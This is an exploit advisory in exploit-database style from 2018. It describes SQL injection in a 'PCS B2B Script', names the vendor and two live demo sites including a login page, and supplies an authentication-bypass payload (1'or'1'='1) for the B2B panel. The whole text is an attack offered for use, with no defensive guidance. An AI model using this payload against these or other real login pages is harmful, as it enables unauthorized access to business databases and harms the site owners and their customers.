# Exploit Title: PCS B2B Script SQL İnjections
# Date: 14.01.2018
# Exploit Author: Ozan Agdepe
# Email: agdepeozan[at]gmail[dot]com
# Author twitter: twitter.com/OAdepe
# Author GitHub: https://github.com/0z4nAgd3p3
#
#
# Google Dork: N/A
# Vendor Homepage: http://www.pringlepcs.co.uk
# Demo:http://www.renaultclaims.co.uk/
# Demo2: http://www.gekkoelite.co.uk/SR01_Login.aspx
# Tested on: KaliLinux_X64/ Win 7-8-10_x64
#
#
# Description:
# An attacker can exploit this vulnerability to read from the B2B database.
# The vulnerability allows an attacker to inject sql commands....
#
#Exploit:
# SQL Injection Type: ByPass SQL İnjections
# Payload: B2B Panel use ByPass SQL incetions command " 1'or'1'='1 "